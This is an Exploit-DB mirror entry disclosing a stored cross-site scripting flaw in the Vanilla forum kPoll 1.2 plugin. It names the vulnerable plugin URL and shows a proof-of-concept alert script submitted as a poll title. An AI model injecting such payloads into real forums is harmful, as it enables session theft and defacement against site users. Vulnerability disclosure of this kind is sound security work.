exploit-db-mirror/exploits/php/webapps/19003.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
508 B
Text

# Title: Vanilla kPoll 1.2 Stored XSS
# Date: 5/6/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Vanilla kPoll 1.2
# http://vanillaforums.org/download
# http://vanillaforums.org/addon/kpoll-plugin
To Create the XSS go to this link,
http://vanilla.tld/index.php?p=/plugin/kPoll
Post your XSS as the poll title.
The XSS I used is
<script>alert('xss')</script>
#############################################################